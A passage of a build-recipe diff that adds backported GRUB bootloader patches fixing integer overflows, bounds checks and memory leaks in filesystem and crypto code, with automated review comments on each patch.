+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_cbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;
+@@ -322,10 +322,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_PCBC:
+ if (do_encrypt)
+ err = grub_crypto_pcbc_encrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_pcbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;
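Review bot: The shift count `dev->log_sector_size` is still used unchecked in all four calls. Widening the left operand to `grub_size_t` stops the result being computed in 32 bits, but a count at or above the width of the type is still undefined behaviour. Whether the field is range-checked when the cryptodisk is set up is not visible in the hunk, so that is worth confirming for values taken from an on-disk header. Computing the size once ahead of the switch, `const grub_size_t sector_size = (grub_size_t) 1 << dev->log_sector_size;`, would also replace the four copies of the expression. The body of grub_cryptodisk_endecrypt starts and ends outside the hunk.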
diff --git a/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
new file mode 100644
index 0000000000..eb459c547f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
@@ -0,0 +1,43 @@
+From 7c1813eeec78892fa651046cc224ae4e80d0c94d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 17:09:31 +0000
+Subject: [PATCH] hfsplus: Check that the volume name length is valid
+
+HFS+ documentation suggests that the maximum filename and volume name is
+255 Unicode characters in length.
+
+So, when converting from big-endian to little-endian, we should ensure
+that the name of the volume has a length that is between 0 and 255,
+inclusive.
+
+Fixes: CID 73641
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2298f6e0d951251bb9ca97d891d1bc8b74515f8c]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/hfsplus.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/grub-core/fs/hfsplus.c b/grub-core/fs/hfsplus.c
+index dae43be..03c3c4c 100644
+--- a/grub-core/fs/hfsplus.c
++++ b/grub-core/fs/hfsplus.c
+@@ -1007,6 +1007,15 @@ grub_hfsplus_label (grub_device_t device, char **label)
+ grub_hfsplus_btree_recptr (&data->catalog_tree, node, ptr);
+
+ label_len = grub_be_to_cpu16 (catkey->namelen);
++
++ /* Ensure that the length is >= 0. */
++ if (label_len < 0)
++ label_len = 0;
++
++ /* Ensure label length is at most 255 Unicode characters. */
++ if (label_len > 255)
++ label_len = 255;
++
+ label_name = grub_calloc (label_len, sizeof (*label_name));
+ if (!label_name)
+ {
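Review bot: Clamping `label_len` to 255 silently truncates an out-of-range `namelen` read from disk instead of treating the catalog key as damaged, so later code keeps working on a record that is already known to be inconsistent. The `label_len < 0` branch also looks unreachable if the value comes straight from a 16-bit unsigned conversion; `label_len` is declared outside the hunk, so confirm its type before keeping the check. I would reject the value instead, `if (label_len > 255) return grub_error (GRUB_ERR_BAD_FS, "invalid volume name length");`, after releasing whatever grub_hfsplus_label() holds at that point. If truncation is intended, say so in the comment: `/* namelen comes from disk; clamp so a damaged label is returned truncated rather than failing the probe. */`.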
diff --git a/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
new file mode 100644
index 0000000000..12418858f9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
@@ -0,0 +1,42 @@
+From c757779e5d09719666c3b155afd2421978a107bd Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 16:41:49 +0000
+Subject: [PATCH] zfs: Fix possible negative shift operation
+
+While it is possible for the return value from zfs_log2() to be zero
+(0), it is quite unlikely, given that the previous assignment to blksz
+is shifted up by SPA_MINBLOCKSHIFT (9) before 9 is subtracted at the
+assignment to epbs.
+
+But, while unlikely during a normal operation, it may be that a carefully
+crafted ZFS filesystem could result in a zero (0) value to the
+dn_datalbkszsec field, which means that the shift left does nothing
+and assigns zero (0) to blksz, resulting in a negative epbs value.
+
+Fixes: CID 73608
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a02091834d3e167320d8a262ff04b8e83c5e616d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 36d0373..0c42cba 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2667,6 +2667,11 @@ dnode_get (dnode_end_t * mdn, grub_uint64_t objnum, grub_uint8_t type,
+ blksz = grub_zfs_to_cpu16 (mdn->dn.dn_datablkszsec,
+ mdn->endian) << SPA_MINBLOCKSHIFT;
+ epbs = zfs_log2 (blksz) - DNODE_SHIFT;
++
++ /* While this should never happen, we should check that epbs is not negative. */
++ if (epbs < 0)
++ epbs = 0;
++
+ blkid = objnum >> epbs;
+ idx = objnum & ((1 << epbs) - 1);
+
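Review bot: Resetting `epbs` to 0 lets dnode_get() carry on with a block size that the commit message itself attributes to a crafted filesystem. With `epbs` at 0 the next two lines give `blkid = objnum` and `idx = 0`, and the lookup proceeds on metadata already known to be invalid. The dnode_get_path() code shown later on this page rejects the same condition with `grub_error (GRUB_ERR_BAD_FS, "0-sized block")`, and doing the same here would be consistent with it. A check placed before the `zfs_log2` call, `if (blksz == 0) return grub_error (GRUB_ERR_BAD_FS, "0-sized block");`, would also avoid depending on what `zfs_log2 (0)` returns. The function's return type and any state held at this point are outside the hunk, so confirm an early return is safe there.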
diff --git a/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
new file mode 100644
index 0000000000..5ded5520e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
@@ -0,0 +1,121 @@
+From 83fdffc07ec4586b375ab36189f255ffbd8f99c2 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 14 Dec 2020 18:54:49 -0300
+Subject: [PATCH] zfs: Fix resource leaks while constructing path
+
+There are several exit points in dnode_get_path() that are causing possible
+memory leaks.
+
+In the while(1) the correct exit mechanism should not be to do a direct return,
+but to instead break out of the loop, setting err first if it is not already set.
+
+The reason behind this is that the dnode_path is a linked list, and while doing
+through this loop, it is being allocated and built up - the only way to
+correctly unravel it is to traverse it, which is what is being done at the end
+of the function outside of the loop.
+
+Several of the existing exit points correctly did a break, but not all so this
+change makes that more consistent and should resolve the leaking of memory as
+found by Coverity.
+
+Fixes: CID 73741
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=89bdab965805e8d54d7f75349024e1a11cbe2eb8]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 30 +++++++++++++++++++++---------
+ 1 file changed, 21 insertions(+), 9 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 0c42cba..9087a72 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2836,8 +2836,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ if (dnode_path->dn.dn.dn_type != DMU_OT_DIRECTORY_CONTENTS)
+ {
+- grub_free (path_buf);
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ err = grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ break;
+ }
+ err = zap_lookup (&(dnode_path->dn), cname, &objnum,
+ data, subvol->case_insensitive);
+@@ -2879,11 +2879,18 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ << SPA_MINBLOCKSHIFT);
+
+ if (blksz == 0)
+- return grub_error(GRUB_ERR_BAD_FS, "0-sized block");
++ {
++ err = grub_error (GRUB_ERR_BAD_FS, "0-sized block");
++ break;
++ }
+
+ sym_value = grub_malloc (sym_sz);
+ if (!sym_value)
+- return grub_errno;
++ {
++ err = grub_errno;
++ break;
++ }
++
+ for (block = 0; block < (sym_sz + blksz - 1) / blksz; block++)
+ {
+ void *t;
+@@ -2893,7 +2900,7 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (err)
+ {
+ grub_free (sym_value);
+- return err;
++ break;
+ }
+
+ movesize = sym_sz - block * blksz;
+@@ -2903,6 +2910,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_memcpy (sym_value + block * blksz, t, movesize);
+ grub_free (t);
+ }
++ if (err)
++ break;
+ free_symval = 1;
+ }
+ path = path_buf = grub_malloc (sym_sz + grub_strlen (oldpath) + 1);
+@@ -2911,7 +2920,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_free (oldpathbuf);
+ if (free_symval)
+ grub_free (sym_value);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ if (free_symval)
+@@ -2949,11 +2959,12 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ err = zio_read (bp, dnode_path->dn.endian, &sahdrp, NULL, data);
+ if (err)
+- return err;
++ break;
+ }
+ else
+ {
+- return grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ err = grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ break;
+ }
+
+ hdrsize = SA_HDR_SIZE (((sa_hdr_phys_t *) sahdrp));
+@@ -2974,7 +2985,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (!path_buf)
+ {
+ grub_free (oldpathbuf);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ path [sym_sz] = 0;
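Review bot: The added `if (err) break;` after the block-copy loop has no comment, and it is the only thing that carries a read failure out of the `while (1)`. The `break` inside the `for` leaves just that inner loop, so without the second test execution would fall through to `free_symval = 1` with `sym_value` already freed. A short comment would stop a later cleanup from removing it as redundant: `/* The break above only exits the for loop; leave the while (1) as well so the freed sym_value is not reused. */`. The first changed site also drops `grub_free (path_buf)` and now relies on the cleanup after the loop, which is outside the hunk, to release it.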
diff --git a/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
new file mode 100644
index 0000000000..8df758b41f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
@@ -0,0 +1,56 @@
+From ec35d862f3567671048aa0d0d8ad1ded1fd25336 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 22:17:04 +0000
+Subject: [PATCH] zfs: Fix possible integer overflows
+
+In all cases the problem is that the value being acted upon by
+a left-shift is a 32-bit number which is then being used in the
+context of a 64-bit number.
+
+To avoid overflow we ensure that the number being shifted is 64-bit
+before the shift is done.
+
+Fixes: CID 73684, CID 73695, CID 73764
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=302c12ff5714bc455949117c1c9548ccb324d55b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 9087a72..b078ccc 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -564,7 +564,7 @@ find_bestub (uberblock_phys_t * ub_array,
+ ubptr = (uberblock_phys_t *) ((grub_properly_aligned_t *) ub_array
+ + ((i << ub_shift)
+ / sizeof (grub_properly_aligned_t)));
+- err = uberblock_verify (ubptr, offset, 1 << ub_shift);
++ err = uberblock_verify (ubptr, offset, (grub_size_t) 1 << ub_shift);
+ if (err)
+ {
+ grub_errno = GRUB_ERR_NONE;
+@@ -1543,7 +1543,7 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ high = grub_divmod64 ((offset >> desc->ashift) + c,
+ desc->n_children, &devn);
+- csize = bsize << desc->ashift;
++ csize = (grub_size_t) bsize << desc->ashift;
+ if (csize > len)
+ csize = len;
+
+@@ -1635,8 +1635,8 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ while (len > 0)
+ {
+- grub_size_t csize;
+- csize = ((s / (desc->n_children - desc->nparity))
++ grub_size_t csize = s;
++ csize = ((csize / (desc->n_children - desc->nparity))
+ << desc->ashift);
+ if (csize > len)
+ csize = len;
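Review bot: The casts in find_bestub and read_device widen to `grub_size_t`, while the description promises a 64-bit operand; `grub_size_t` follows the target's pointer width, so on 32-bit builds `(grub_size_t) 1 << ub_shift` and `(grub_size_t) bsize << desc->ashift` are still 32-bit shifts. If the intent is a 64-bit computation, an explicit `(grub_uint64_t)` cast with a checked narrowing says so; otherwise the description should state that the result is deliberately limited to `grub_size_t`. The context line `((i << ub_shift)` in find_bestub keeps the unwidened shift. `ub_shift` and `desc->ashift` appear to come from on-disk metadata, and no range check on them is visible in these hunks, so it is worth confirming they are bounded below the operand width before the shift. All three functions continue outside the hunks shown.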
diff --git a/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
new file mode 100644
index 0000000000..555dc19168
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
@@ -0,0 +1,35 @@
+From b085da8efda9b81f94aa197ee045226563554fdf Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:56:45 +0000
+Subject: [PATCH] zfsinfo: Correct a check for error allocating memory
+
+While arguably the check for grub_errno is correct, we should really be
+checking the return value from the function since it is always possible
+that grub_errno was set elsewhere, making this code behave incorrectly.
+
+Fixes: CID 73668
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7aab03418ec6a9b991aa44416cb2585aff4e7972]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfsinfo.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfsinfo.c b/grub-core/fs/zfs/zfsinfo.c
+index c8a28ac..bf29180 100644
+--- a/grub-core/fs/zfs/zfsinfo.c
++++ b/grub-core/fs/zfs/zfsinfo.c
+@@ -358,8 +358,8 @@ grub_cmd_zfs_bootfs (grub_command_t cmd __attribute__ ((unused)), int argc,
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("one argument expected"));
+
+ devname = grub_file_get_device_name (args[0]);
+- if (grub_errno)
+- return grub_errno;
++ if (devname == NULL)
++ return GRUB_ERR_OUT_OF_MEMORY;
+
+ dev = grub_device_open (devname);
+ grub_free (devname);
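Review bot: The new check in grub_cmd_zfs_bootfs reports every NULL from `grub_file_get_device_name ()` as `GRUB_ERR_OUT_OF_MEMORY`, and it returns the bare code without going through `grub_error ()`, so no message is recorded. That helper is not shown here; if it can also return NULL for an argument that names no device or is malformed, the command would now fail with a misleading out-of-memory status where the old code went on to `grub_device_open (devname)`. A more defensive form is `if (devname == NULL && grub_errno != GRUB_ERR_NONE) return grub_errno;`, which keeps the helper's own error and leaves the no-device case to `grub_device_open ()`. The function body continues outside the hunk.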
diff --git a/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
new file mode 100644
index 0000000000..435130516c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
@@ -0,0 +1,82 @@
+From 929c2ce8214c53cb95abff57a89556cd18444097 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:48:07 +0000
+Subject: [PATCH] affs: Fix memory leaks
+
+The node structure reference is being allocated but not freed if it
+reaches the end of the function. If any of the hooks had returned
+a non-zero value, then node would have been copied in to the context
+reference, but otherwise node is not stored and should be freed.
+
+Similarly, the call to grub_affs_create_node() replaces the allocated
+memory in node with a newly allocated structure, leaking the existing
+memory pointed by node.
+
+Finally, when dir->parent is set, then we again replace node with newly
+allocated memory, which seems unnecessary when we copy in the values
+from dir->parent immediately after.
+
+Fixes: CID 73759
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=178ac5107389f8e5b32489d743d6824a5ebf342a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/affs.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/grub-core/fs/affs.c b/grub-core/fs/affs.c
+index 220b371..230e26a 100644
+--- a/grub-core/fs/affs.c
++++ b/grub-core/fs/affs.c
+@@ -400,12 +400,12 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ {
+ unsigned int i;
+ struct grub_affs_file file;
+- struct grub_fshelp_node *node = 0;
++ struct grub_fshelp_node *node, *orig_node;
+ struct grub_affs_data *data = dir->data;
+ grub_uint32_t *hashtable;
+
+ /* Create the directory entries for `.' and `..'. */
+- node = grub_zalloc (sizeof (*node));
++ node = orig_node = grub_zalloc (sizeof (*node));
+ if (!node)
+ return 1;
+
+@@ -414,9 +414,6 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ return 1;
+ if (dir->parent)
+ {
+- node = grub_zalloc (sizeof (*node));
+- if (!node)
+- return 1;
+ *node = *dir->parent;
+ if (hook ("..", GRUB_FSHELP_DIR, node, hook_data))
+ return 1;
+@@ -456,17 +453,18 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+
+ if (grub_affs_create_node (dir, hook, hook_data, &node, &hashtable,
+ next, &file))
+- return 1;
++ {
++ /* Node has been replaced in function. */
++ grub_free (orig_node);
++ return 1;
++ }
+
+ next = grub_be_to_cpu32 (file.next);
+ }
+ }
+
+- grub_free (hashtable);
+- return 0;
+-
+ fail:
+- grub_free (node);
++ grub_free (orig_node);
+ grub_free (hashtable);
+ return 0;
+ }
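Review bot: In grub_affs_iterate_dir the single `orig_node` allocation is now handed to `hook (".")`, overwritten and handed to `hook ("..")`, and then freed at `fail:`, which is only safe if a hook that returns 0 neither frees nor retains the node it was given. The hook implementations are not visible here; if any of them releases the node on a non-match, the `*node = *dir->parent` write would touch freed memory and the final `grub_free (orig_node)` would be a double free, so this contract should be confirmed against the callers. A comment above the allocation stating the ownership rule, for example `/* Hooks take ownership of node only when they return non-zero. */`, would make the assumption explicit. Since the success path now also falls through `fail:`, renaming the label or adding `/* Also reached on success. */` would avoid misreading it.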
diff --git a/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
new file mode 100644
index 0000000000..f500f1a296
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
@@ -0,0 +1,36 @@
+From 9b16d7bcad1c7fea7f26eb2fb3af1a5ca70ba34e Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 3 Nov 2020 16:43:37 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible unintended sign extension
+
+The array of unsigned char gets promoted to a signed 32-bit int before
+it is finally promoted to a size_t. There is the possibility that this
+may result in the signed-bit being set for the intermediate signed
+32-bit int. We should ensure that the promotion is to the correct type
+before we bitwise-OR the values.
+
+Fixes: CID 96697
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e8814c811132a70f9b55418f7567378a34ad3883]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index a3435ed..7ecad27 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -458,7 +458,7 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ if (len && len < 4)
+ return gcry_error (GPG_ERR_TOO_SHORT);
+
+- n = (s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3]);
++ n = ((size_t)s[0] << 24 | (size_t)s[1] << 16 | (size_t)s[2] << 8 | (size_t)s[3]);
+ s += 4;
+ if (len)
+ len -= 4;
diff --git a/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
new file mode 100644
index 0000000000..08299d021e
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
@@ -0,0 +1,33 @@
+From d26c8771293637b0465f2cb67d97cb58bacc62da Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:41:54 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible NULL dereference
+
+The code in gcry_mpi_scan() assumes that buffer is not NULL, but there
+is no explicit check for that, so we add one.
+
+Fixes: CID 73757
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ae0f3fabeba7b393113d5dc185b6aff9b728136d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index 7ecad27..6fe3891 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -379,6 +379,9 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ unsigned int len;
+ int secure = (buffer && gcry_is_secure (buffer));
+
++ if (!buffer)
++ return gcry_error (GPG_ERR_INV_ARG);
++
+ if (format == GCRYMPI_FMT_SSH)
+ len = 0;
+ else
diff --git a/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
new file mode 100644
index 0000000000..d8c21d88f7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
@@ -0,0 +1,43 @@
+From ea12feb69b6af93c7e2fa03df7ac3bd1f4edd599 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 15:31:53 +0000
+Subject: [PATCH] syslinux: Fix memory leak while parsing
+
+In syslinux_parse_real() the 2 points where return is being called
+didn't release the memory stored in buf which is no longer required.
+
+Fixes: CID 176634
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=95bc016dba94cab3d398dd74160665915cd08ad6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/syslinux_parse.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/syslinux_parse.c b/grub-core/lib/syslinux_parse.c
+index 4afa992..3acc6b4 100644
+--- a/grub-core/lib/syslinux_parse.c
++++ b/grub-core/lib/syslinux_parse.c
+@@ -737,7 +737,10 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ && grub_strncasecmp ("help", ptr3, ptr4 - ptr3) == 0))
+ {
+ if (helptext (ptr5, file, menu))
+- return 1;
++ {
++ grub_free (buf);
++ return 1;
++ }
+ continue;
+ }
+
+@@ -757,6 +760,7 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ }
+ fail:
+ grub_file_close (file);
++ grub_free (buf);
+ return err;
+ }
+
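Review bot: The early return added after `helptext (ptr5, file, menu)` in syslinux_parse_real frees `buf` but still bypasses the `fail:` label, where `grub_file_close (file)` runs. On that path the file handle therefore appears to stay open. Either add `grub_file_close (file);` next to the new `grub_free (buf);`, or set `err` and use `goto fail` so that both releases live in one place. The loop that assigns `buf` is outside the hunk, so it should also be checked that `buf` is not already freed there without being reset to NULL before `fail:` frees it again.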
diff --git a/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
new file mode 100644
index 0000000000..8a26e5bc5b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
@@ -0,0 +1,52 @@
+From 2367049d2021e00d82d19cee923e06a4b04ebc30 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 18:56:48 +0000
+Subject: [PATCH] normal/completion: Fix leaking of memory when processing a
+ completion
+
+It is possible for the code to reach the end of the function without
+freeing the memory allocated to argv and argc still to be 0.
+
+We should always call grub_free(argv). The grub_free() will handle
+a NULL argument correctly if it reaches that code without the memory
+being allocated.
+
+Fixes: CID 96672
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9213575b7a95b514bce80be5964a28d407d7d56d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/normal/completion.c | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/normal/completion.c b/grub-core/normal/completion.c
+index 5961028..46e473c 100644
+--- a/grub-core/normal/completion.c
++++ b/grub-core/normal/completion.c
+@@ -400,8 +400,8 @@ char *
+ grub_normal_do_completion (char *buf, int *restore,
+ void (*hook) (const char *, grub_completion_type_t, int))
+ {
+- int argc;
+- char **argv;
++ int argc = 0;
++ char **argv = NULL;
+
+ /* Initialize variables. */
+ match = 0;
+@@ -516,10 +516,8 @@ grub_normal_do_completion (char *buf, int *restore,
+
+ fail:
+ if (argc != 0)
+- {
+- grub_free (argv[0]);
+- grub_free (argv);
+- }
++ grub_free (argv[0]);
++ grub_free (argv);
+ grub_free (match);
+ grub_errno = GRUB_ERR_NONE;
+
diff --git a/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
new file mode 100644
index 0000000000..e34a19e12c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
@@ -0,0 +1,56 @@
+From b136fa14d26d1833ffcb852f86e65da5960cfb99 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
